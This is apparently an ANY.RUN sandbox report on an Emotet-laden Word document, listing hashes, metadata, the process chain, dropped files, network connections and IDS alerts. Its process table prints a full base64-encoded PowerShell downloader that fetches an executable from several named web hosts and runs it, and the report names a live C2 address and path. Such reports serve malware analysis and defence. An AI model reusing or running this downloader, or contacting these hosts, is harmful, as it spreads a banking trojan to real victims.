Malware analysis DATA_18092019_WE3802.doc Malicious activity

Add for printing

File name:	DATA_18092019_WE3802.doc
Full analysis:	https://app.any.run/tasks/5516d425-a5f9-4399-89f7-d578be0f19a4
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Malware Trends Tracker >>>
Analysis date:	September 18, 2019, 16:38:41
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	macros macros-on-open emotet-doc emotet generated-doc trojan
Indicators:
MIME:	application/msword
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: New Mexico input, Subject: ROI, Author: Tad King, Comments: East Caribbean Dollar service-desk, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 11:25:00 2019, Last Saved Time/Date: Wed Sep 18 11:25:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:	1D7E3E6C8609ED9736028A794B062700
SHA1:	0A2BF8BC82622789AC37DBE8174B0A95D898A47D
SHA256:	75F68366E8B144B780CCF59E9ED7DDB89C5AF57DAC5B0AB80DCB053D91208E67
SSDEEP:	6144:Mipm1VmTG3cBubZMHY6I2KDNTto08WQpqLkI47NSU4jJntATfDicj1jVkAa:Mipm1VmTG3cBubZMHY6I2KDNTto08WQA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Application was dropped or rewritten from another process
  - 553.exe (PID: 1676)
  - 553.exe (PID: 2312)
  - 553.exe (PID: 3500)
  - 553.exe (PID: 3384)
  - easywindow.exe (PID: 3792)
  - easywindow.exe (PID: 3544)
  - easywindow.exe (PID: 2816)
  - easywindow.exe (PID: 2728)
- Emotet process was detected
  - 553.exe (PID: 2312)
- Connects to CnC server
  - easywindow.exe (PID: 3544)
- EMOTET was detected
  - easywindow.exe (PID: 3544)
- Changes the autorun value in the registry
  - easywindow.exe (PID: 3544)
SUSPICIOUS
- Executed via WMI
  - powershell.exe (PID: 2432)
- Creates files in the user directory
  - powershell.exe (PID: 2432)
- PowerShell script executed
  - powershell.exe (PID: 2432)
- Starts itself from another location
  - 553.exe (PID: 2312)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 2432)
  - 553.exe (PID: 2312)
- Connects to server without host name
  - easywindow.exe (PID: 3544)
INFO
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 3532)
- Creates files in the user directory
  - WINWORD.EXE (PID: 3532)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.doc	\|	Microsoft Word document (54.2)
.doc	\|	Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType:	Microsoft Word 97-2003 Document
CompObjUserTypeLen:	32
Manager:	Stamm
HeadingPairs:	Title 1
TitleOfParts:	-
HyperlinksChanged:	No
SharedDoc:	No
LinksUpToDate:	No
ScaleCrop:	No
AppVersion:	16
CharCountWithSpaces:	641
Paragraphs:	1
Lines:	4
Company:	Kovacek Group
CodePage:	Windows Latin 1 (Western European)
Security:	None
Characters:	547
Words:	95
Pages:	1
ModifyDate:	2019:09:18 10:25:00
CreateDate:	2019:09:18 10:25:00
TotalEditTime:	-
Software:	Microsoft Office Word
RevisionNumber:	1
LastModifiedBy:	-
Template:	Normal.dotm
Comments:	East Caribbean Dollar service-desk
Keywords:	-
Author:	Tad King
Subject:	ROI
Title:	New Mexico input

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3532	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DATA_18092019_WE3802.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
2432	powershell -encod JABiAGsAYQB0AGEAdwBaAD0AJwBzAHcAaQBRAEsASgA1ACcAOwAkAGIAQgBNAGoAdgBaAG4AIAA9ACAAJwA1ADUAMwAnADsAJABrAGkASABSADMASQBiAD0AJwBWADQATwBCAEMARwBYACcAOwAkAEQASwBpAE8AWABiAGsAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgBCAE0AagB2AFoAbgArACcALgBlAHgAZQAnADsAJABYAEkAYgA5AG0AQQA2AD0AJwBOADMARABxAE0ASAAnADsAJABaAGMAdAB6AEUARgA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAEUAYgBjAGwAaQBlAE4AdAA7ACQAcgB3AEYAMABzAEMAQwB6AD0AJwBoAHQAdABwADoALwAvAGIAcgBpAGsAZQBlAC4AYwBvAG0ALwBnAGEAbABsAGUAcgB5AC8ANABkAGMAbQBuADcAMgA0ADMAMAAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AZQBjAGgAZQBsAG8AbgBhAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdAB5AGgANQA3ADcANgA5AC8AQABoAHQAdABwADoALwAvAGcAcgB1AHAAbwBlAHEALgBjAG8AbQAvAGwAZQBkAHMALwBkAGEAbAA1ADIAMwAwADEALwBAAGgAdAB0AHAAOgAvAC8AawBpAHIAcwB0AGUAbgBiAGkAagBsAHMAbQBhAC4AYwBvAG0ALwBlAGMAcAA0AC8AbQBoAGgAMgAwADMAMAA1AC8AQABoAHQAdABwADoALwAvAHAAYQBpAGYAaQAuAG4AZQB0AC8AcwBzAGYAbQAvAGIAbQA4ADQAMAAvACcALgAiAFMAUABgAGwAaQBUACIAKAAnAEAAJwApADsAJAB1AGEAVABqAGsAMABMAD0AJwBrAG0AegBjAEsAegB3ACcAOwBmAG8AcgBlAGEAYwBoACgAJABqADAAbgBvAG8ATwBpACAAaQBuACAAJAByAHcARgAwAHMAQwBDAHoAKQB7AHQAcgB5AHsAJABaAGMAdAB6AEUARgAuACIAZABgAE8AYABXAE4AbABgAE8AQQBEAEYAaQBMAGUAIgAoACQAagAwAG4AbwBvAE8AaQAsACAAJABEAEsAaQBPAFgAYgBrAHcAKQA7ACQASQBJAHYAOABIAFgAPQAnAEoAdgBiAHUAcQBIADAAaQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0ACcAKwAnAGUAbQAnACkAIAAkAEQASwBpAE8AWABiAGsAdwApAC4AIgBMAGUAbgBgAEcAdABIACIAIAAtAGcAZQAgADIANAAwADQAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYQBgAFIAVAAiACgAJABEAEsAaQBPAFgAYgBrAHcAKQA7ACQARQA0AEoAUQBDAE0APQAnAGkAcwBGAEUAUABaACcAOwBiAHIAZQBhAGsAOwAkAHYAdQA5AFMANwBFAGwAdwA9ACcAaQBCAGYAegA2ADkAegAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABMAEEANABzAHUAegA9ACcATwBGAHEATABWAGsASgBEACcA	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		wmiprvse.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1676	"C:\Users\admin\553.exe"	C:\Users\admin\553.exe	—	powershell.exe
User: admin Integrity Level: MEDIUM Exit code: 0
3384	"C:\Users\admin\553.exe"	C:\Users\admin\553.exe	—	553.exe
User: admin Integrity Level: MEDIUM Exit code: 0
3500	--12e39b71	C:\Users\admin\553.exe	—	553.exe
User: admin Integrity Level: MEDIUM Exit code: 0
2312	--12e39b71	C:\Users\admin\553.exe		553.exe
User: admin Integrity Level: MEDIUM Exit code: 0
3792	"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"	C:\Users\admin\AppData\Local\easywindow\easywindow.exe	—	553.exe
User: admin Integrity Level: MEDIUM Exit code: 0
2728	"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"	C:\Users\admin\AppData\Local\easywindow\easywindow.exe	—	easywindow.exe
User: admin Integrity Level: MEDIUM Exit code: 0
2816	--fd47f3b8	C:\Users\admin\AppData\Local\easywindow\easywindow.exe	—	easywindow.exe
User: admin Integrity Level: MEDIUM Exit code: 0
3544	--fd47f3b8	C:\Users\admin\AppData\Local\easywindow\easywindow.exe		easywindow.exe
User: admin Integrity Level: MEDIUM

Add for printing

Total events

1 752

Read events

1 269

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3532	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR9A70.tmp.cvr		—
		MD5:—	SHA256:—
3532	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd		tlb
		MD5:84418866AF2AB40BF4C961694A08B7ED	SHA256:D1561594779060D9ED3D1DE41BFE865E94B60996D23090FD320DAE148F7FEE71
3532	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\550EBAED.wmf		wmf
		MD5:832DF9F2011E7711716980C5420BC70E	SHA256:F3CC039D94FE8C373EF95D93ACB073E6DA5927D3C31FF8AE8D1D0B5897C32FD0
3532	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0D7F883.wmf		wmf
		MD5:9FA8D38E61F8AF08F70729ABB157CAF2	SHA256:F3E0E345CBDDFE0C0A80673151F24D24CBF83EB48C640DCE984FBD373949B5C3
3532	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B16F79C.wmf		wmf
		MD5:B35A209E6DFCFC143D93F24249DF1CE2	SHA256:986DFFB4355B3AA21EFE4E3E7E7108D02DFFD23336E0357D32C43105278AA104
3532	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A2FC1E5.wmf		wmf
		MD5:54DAE8F6F9C19A3992E1C00C91F0B256	SHA256:CC0D0D13E937B36B1D335F98BCDBD872BC7617814F83E7617CD7E98E4AB889A5
3532	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF69D247.wmf		wmf
		MD5:9CF00B1602EB2993484759EC56F45BE5	SHA256:8E27B2AB1D09E0FAE705086B6D6DDF46FFEF570CC1CA99AED59E8554AFFF470E
3532	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EDA38889.wmf		wmf
		MD5:9482757680093223F5F01977140F780C	SHA256:C56854A4C0A7CCED07ED1A4E18F70748BA40247737ABBBEDFE2B80E54D3D3272
3532	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95DA4301.wmf		wmf
		MD5:E3F9F7A942A5E17CECF4459769B6644F	SHA256:3D6EC150DAAADCA85923974E0B9AD43E3AB8247C8C7C954FFBBDBEFCD1106A5B
3532	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\715EEC0A.wmf		wmf
		MD5:AFF53A8D48DD1DAFD3C3E388054B5527	SHA256:5BA2E2AFCDBDA9FE170929606A89309F99A888CE2995BDB13F523D8C9DB3163B

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3544	easywindow.exe	POST	200	189.129.4.186:80	http://189.129.4.186/free/stubs/ringin/	MX	binary	132 b	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
2432	powershell.exe	129.121.15.236:80	brikee.com	Colo4, LLC	US	suspicious
3544	easywindow.exe	189.129.4.186:80	—	Uninet S.A. de C.V.	MX	malicious

DNS requests

Domain	IP	Reputation
brikee.com	129.121.15.236	suspicious

Threats

PID	Process	Class	Message
2432	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
2432	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2432	powershell.exe	Misc activity	ET INFO EXE - Served Attached HTTP
3544	easywindow.exe	A Network Trojan was detected	AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3544	easywindow.exe	A Network Trojan was detected	MALWARE [PTsecurity] Feodo/Emotet

3 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

DATA_18092019_WE3802.doc

1D7E3E6C8609ED9736028A794B062700

0A2BF8BC82622789AC37DBE8174B0A95D898A47D

75F68366E8B144B780CCF59E9ED7DDB89C5AF57DAC5B0AB80DCB053D91208E67

6144:Mipm1VmTG3cBubZMHY6I2KDNTto08WQpqLkI47NSU4jJntATfDicj1jVkAa:Mipm1VmTG3cBubZMHY6I2KDNTto08WQA

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Application was dropped or rewritten from another process

Emotet process was detected

Connects to CnC server

EMOTET was detected

Changes the autorun value in the registry

SUSPICIOUS

Executed via WMI

Creates files in the user directory

PowerShell script executed

Starts itself from another location

Executable content was dropped or overwritten

Connects to server without host name

INFO

Reads Microsoft Office registry keys

Creates files in the user directory

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings